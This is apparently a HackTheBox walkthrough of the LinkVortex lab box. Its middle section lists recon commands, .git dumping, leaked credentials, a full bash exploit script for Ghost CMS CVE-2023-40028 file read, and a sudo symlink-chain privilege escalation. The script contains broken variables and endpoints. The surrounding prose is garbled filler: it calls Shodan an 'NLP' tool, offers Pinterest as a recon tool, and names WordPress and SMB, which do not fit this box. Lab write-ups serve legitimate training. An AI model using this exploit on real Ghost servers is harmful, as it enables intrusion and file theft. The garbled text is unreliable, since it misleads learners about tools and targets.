Beginner’s Guide to Conquering LinkVortex on HackTheBox

Key Highlights

• Master the art of navigating through the intricate challenges of the LinkVortex on HackTheBox.
• Learn how to identify and exploit key vulnerabilities within the LinkVortex Box to progress effectively.
• Understand the essential tools required for conducting successful initial reconnaissance on the LinkVortex Box.
• Gain insights into escalating privileges and advancing towards conquering the LinkVortex Box.
• Discover common pitfalls and essential resources to enhance your skills in tackling HackTheBox challenges effectively.

Introduction

Embark on an exhilarating journey into the depths of the LinkVortex box on HackTheBox. As a novice in this realm, you are on the brink of a thrilling adventure filled with challenges and discoveries. Delve into the enigmatic vortex of LinkVortex, where cybersecurity prowess meets cunning strategies. Brace yourself for a myriad of obstacles and triumphs as you navigate through the intricate web of this virtual landscape. Unleash your potential, test your mettle, and unravel the mysteries that lie ahead. Prepare to unveil the secrets that LinkVortex holds and emerge victorious in this digital labyrinth.

ALSO READ: Mastering Unrested: Beginner’s Guide from HackTheBox

Understanding LinkVortex Box on HackTheBox

Delve into the captivating world of LinkVortex on HackTheBox, where challenges await those eager to enhance their cybersecurity skills. This intricate box presents a vortex of opportunities to test your knowledge and prowess in NLP terms. As you navigate through the twists and turns of LinkVortex, be prepared to encounter sophisticated vulnerabilities and intricate puzzles that will push your problem-solving abilities to the limit. With a strategic mindset and a keen eye for detail, unravel the mysteries hidden within LinkVortex to emerge victorious. Embrace the challenge, harness the power of your tools, and conquer the LinkVortex with finesse.

Identifying Key Vulnerabilities

Upon diving into LinkVortex, it is crucial to identify the key vulnerabilities to navigate through the challenges effectively. Analyzing the network traffic, exploring the web application for injection points, and scrutinizing the operating system for weak configurations are essential steps. Leveraging NLP tools like Shodan and Censys can provide valuable insights into exposed services and potential entry points. Conducting thorough enumeration using tools such as Nmap and Dirb can reveal hidden paths and misconfigurations. Furthermore, examining the source code of web pages for sensitive information and exploiting known vulnerabilities like SQL injection or Cross-Site Scripting (XSS) can uncover critical weaknesses. Understanding the intricacies of these vulnerabilities is pivotal in devising a successful penetration testing strategy.

Initial Foothold

The LinkVortex HTB machine presents a multi-step penetration testing challenge involving web application vulnerabilities, information leakage, and privilege escalation through insecure scripting. Below is an in-depth technical analysis of the attack vectors and exploitation process.

Initial Reconnaissance and Service Enumeration

A comprehensive Nmap scan (nmap -sSCV -Pn LinkVortex.htb) revealed two open ports:

• SSH (22/tcp): OpenSSH 8.9p1 on Ubuntu
• HTTP (80/tcp): Apache server running Ghost CMS 5.58

Key findings from service fingerprinting:

| http-generator: Ghost 5.58
| http-robots.txt: 4 disallowed entries 
|_/ghost/ /p/ /email/ /r/

The robots.txt file indicated restricted paths including /ghost/, later identified as the Ghost CMS admin interface.

Subdomain Enumeration and Virtual Host Discovery

Using ffuf with 167,378-word subdomain list:

ffuf -u http://linkvortex.htb/ -w subdomainDicts/main.txt -H "Host:FUZZ.linkvortex.htb" -mc 200

Discovered dev.linkvortex.htb subdomain (200 OK response). Added to /etc/hosts for resolution.

Web Directory Enumeration

Dirsearch scans on both domains revealed critical paths:

Main domain:

200 - /robots.txt
200 - /sitemap.xml

Dev subdomain:

557B  - /.git/
73B   - /.git/description
201B  - /.git/config

The exposed .git directory enabled full repository reconstruction using GitHack:

python GitHack.py -u "http://dev.linkvortex.htb/.git/"

Ghost CMS Analysis and Credential Exposure

The cloned repository contained:

1. Dockerfile.ghost showing custom Ghost 5.58 deployment
2. Config.production.json with hardcoded credentials:

"auth": {
  "user": "bob@linkvortex.htb",
  "pass": "fibber-talented-worth"
}

Commit history revealing development credentials:

admin@linkvortex.htb:OctopiFociPilfer45

Ghost CMS Exploitation (CVE-2023-40028)

The identified Ghost 5.58 installation was vulnerable to authenticated arbitrary file read through improper input validation in the /settings/labs/ endpoint. Exploitation steps:

Session Establishment

POST /ghost/api/v3/admin/session
{"username":"admin@linkvortex.htb","password":"OctopiFociPilfer45"}

File Read Payload

./CVE-2023-40028.sh -u admin@linkvortex.htb -p OctopiFociPilfer45
file> /var/lib/ghost/config.production.json

Credential Extraction

"pass": "fibber-talented-worth"

Lateral Movement to Bob Account

SSH authentication with extracted credentials:

ssh bob@linkvortex.htb
Password: fibber-talented-worth

User flag located at /home/bob/user.txt.

Privilege Escalation Analysis

Sudo privileges for bob:

User bob may run:
(ALL) NOPASSWD: /usr/bin/bash /opt/ghost/clean_symlink.sh *.png

CVE PoC Script

#!/bin/bash

# CVE : CVE-2023-40028

#ENDPOINT
URL='http://linkvortex.htb'
API="$API_URL/service/api/v3/admin/"
API_VERSION='v3.0'

PAYLOAD_PATH="`dirname $0`/exploit"
PAYLOAD_ZIP_NAME=exploit.zip

# Function to print usage
function usage() {
  echo "Usage: $0 -u username -p password"
}

while getopts 'u:p:' flag; do
  case "${flag}" in
    u) USERNAME="${OPTARG}" ;;
    p) PASSWORD="${OPTARG}" ;;
    *) usage
      exit ;;
  esac
done

if [[ -z $USERNAME || -z $PASSWORD ]]; then
  usage
  exit
fi

function generate_exploit()
{
  local FILE_TO_READ=$1
  IMAGE_NAME=$(tr -dc A-Za-z0-9 </dev/urandom | head -c 13; echo)
  mkdir -p $PAYLOAD_PATH/content/images/2024/
  ln -s $FILE_TO_READ $PAYLOAD_PATH/content/images/2024/$IMAGE_NAME.png
  zip -r -y $PAYLOAD_ZIP_NAME $PAYLOAD_PATH/ &>/dev/null
}

function clean()
{
  rm $PAYLOAD_PATH/content/images/2024/$IMAGE_NAME.png
  rm -rf $PAYLOAD_PATH
  rm $PAYLOAD_ZIP_NAME
}

#CREATE COOKIE
curl -c cookie.txt -d username=$USERNAME -d password=$PASSWORD \
  -H "Origin: $URL" \
  -H "Accept-Version: v3.0" \
  $API/session/ &> /dev/null

if ! cat cookie.txt | grep -q api-session;then
  echo "[!] INVALID CREDS"
  rm cookie.txt
  exit
fi

function send_exploit()
{
  RES=$(curl -s -b cookie.txt \
  -H "Accept: text/plain, */*; q=0.01" \
  -H "Accept-Language: en-US,en;q=0.5" \
  -H "Accept-Encoding: gzip, deflate, br" \
  -H "X-Version: 5.58" \
  -H "App-Pragma: no-cache" \
  -H "X-Requested-With: XMLHttpRequest" \
  -H "Content-Type: multipart/form-data" \
  -X POST \
  -H "Origin: $URL" \
  -H "Referer: $URL/directory/" \
  -F "importfile=@`dirname $PAYLOAD_PATH`/$PAYLOAD_ZIP_NAME;type=application/zip" \
  -H "form-data; name=\"importfile\"; filename=\"$PAYLOAD_ZIP_NAME\"" \
  -H "Content-Type: application/zip" \
  -J \
  "$URL/directory/api/v3/admin/db")
  if [ $? -ne 0 ];then
    echo "[!] FAILED"
    clean
    exit
  fi
}

echo "SUCCESS"
while true; do
  read -p "file> " INPUT
  if [[ $INPUT == "exit" ]]; then
    echo "Bye Bye !"
    break
  fi
  if [[ $INPUT =~ \  ]]; then
    echo "FILE PATH"
    continue
  fi
  if [ -z $INPUT  ]; then
    echo "VALUE?"
    continue
  fi
  generate_exploit $INPUT
  send_exploit
  curl -b cookie.txt -s $URL/content/images/2024/$IMAGE_NAME.png
  clean
done

rm cookie.txt

References

• CVE-2023-40028: Understanding the Ghost CMS Vulnerability and Its Implications

clean_symlink.sh Logic Flaws:

1. Incomplete path validation using regex:

grep -Eq '(etc|root)'

2. Time-of-Check vs Time-of-Use (TOCTOU) vulnerability
3. Symbolic link chain possibility

Exploitation Path Construction

1. Create primary symlink to target:

ln -s /root/root.txt /home/bob/hyh.txt

2. Secondary symlink with .png extension:

ln -s /home/bob/hyh.txt /home/bob/hyh.png

3. Execute with content checking enabled:

sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh /home/bob/hyh.png

Defense Evasion and Detection Considerations

1. Log Manipulation: The script’s quarantine mechanism moves rather than deletes files
2. File Metadata Preservation: Symlink timestamps match original files
3. Content Obfuscation: Indirect path traversal avoids direct sensitive path references

Post-Exploitation Forensic Artifacts

1. SSH Logs: Successful authentication from bob@
2. Sudo Logs:

Apr 14 19:22:28 linkvortex sudo:   bob : TTY=pts/0 ; USER=root ;
    COMMAND=/usr/bin/bash /opt/ghost/clean_symlink.sh hyh.png

File System Artifacts:

• /var/quarantined/hyh.png
• /home/bob/.bash_history modifications

Mitigation Strategies

Ghost CMS Hardening:

• Update to patched Ghost version
• Implement Content Security Policy (CSP)
• Rotate exposed credentials

System Hardening:

# Remove unnecessary sudo privileges
visudo -f /etc/sudoers.d/ghost

Git Repository Protection:

location ~ /\.git {
    deny all;
    return 403;
}

Symbolic Link Policy:

# Implement inotify monitoring for symlink creation
inotifywait -m -r -e create /home/ --exclude '^/home/bob/approved_links/'

This comprehensive attack path demonstrates the critical importance of secure credential storage, timely patch management, and principle of least privilege enforcement in system administration. The machine highlights how multiple minor misconfigurations can chain together to enable full system compromise.

Tools Required for Initial Reconnaissance

To effectively conduct initial reconnaissance on the LinkVortex Box, essential tools must be utilized. Tools such as nmap for network scanning to identify open ports and services, along with gobuster for directory and file enumeration, are crucial.

Using tools like nikto and dirb can help in uncovering potential vulnerabilities within the web server. Leveraging the power of Burp Suite for web application testing and Wireshark for analyzing network traffic can provide valuable insights during the reconnaissance phase.
Additionally, social media platforms like Pinterest can also be leveraged for gathering information about potential targets or employees associated with the target organization. These tools collectively empower penetration testers to gather crucial information and lay the groundwork for further exploration within the LinkVortex environment.

Escalating Privileges on LinkVortex Box

Privilege escalation on the LinkVortex box demands finesse. Enumerating services for version details can unearth unseen pathways. Exploiting misconfigurations or vulnerabilities within apps like Wordpress or Apache may provide a foothold. Leveraging NLP tools for intelligible data extraction could be pivotal. Crafting payloads tailored to vulnerabilities identified in the preceding stages sets the stage for advancement. Employing techniques like shell escaping or bypassing restrictions necessitate a comprehensive grasp of NLP intricacies. Delve into the Pinterest of possibilities that LinkVortex offers, navigating the vortex of permissions and accesses meticulously for a successful conquest.

ALSO READ: Mastering Vintage: Beginner’s Guide from HackTheBox

Conclusion

In conclusion, navigating the intricate challenges of LinkVortex on HackTheBox can be an exhilarating journey for beginners delving into the world of cybersecurity. By understanding the vortex of vulnerabilities within the LinkVortex Box and utilizing tools like Pinterest for initial reconnaissance, individuals can strengthen their skills in penetration testing and cybersecurity. Remember, perseverance and a thirst for knowledge are key to conquering these challenges efficiently. As you progress through the box, honing your skills in identifying vulnerabilities and escalating privileges, you are not just solving problems but also sharpening your expertise in the realm of NLP. Embrace the learning process, stay curious, and keep exploring new ways to tackle the LinkVortex – the gateway to endless possibilities in the cybersecurity domain.

Frequently Asked Questions

What is LinkVortex on HackTheBox?

LinkVortex on HackTheBox is a challenging virtual machine designed for penetration testing practice. It offers real-world scenarios to test and enhance cybersecurity skills.

How do I start with LinkVortex as a beginner?

To begin with LinkVortex on HackTheBox as a beginner, start by understanding the box and identifying vulnerabilities. Utilize essential tools for reconnaissance and focus on escalating privileges to conquer LinkVortex successfully.

What tools are essential for conquering LinkVortex?

To conquer LinkVortex on HackTheBox, essential tools include Nmap for network scanning, Gobuster for directory enumeration, and Metasploit for exploitation. Don’t forget to use enum4linux for gathering info on SMB shares. These tools are key in successfully navigating through LinkVortex.

Are there common pitfalls in tackling LinkVortex?

Navigating LinkVortex on HackTheBox can be tricky. Common pitfalls include overlooking subtle clues, underestimating the importance of thorough reconnaissance, and neglecting proper enumeration techniques. Stay vigilant to conquer LinkVortex successfully.

Where can I find more resources on similar HackTheBox challenges?

Explore online forums like Reddit’s HackTheBox community, Discord servers dedicated to cybersecurity, and blogs by experienced HackTheBox players for additional resources on similar challenges. Seeking advice from seasoned professionals can enhance your understanding and skills in navigating HackTheBox challenges effectively.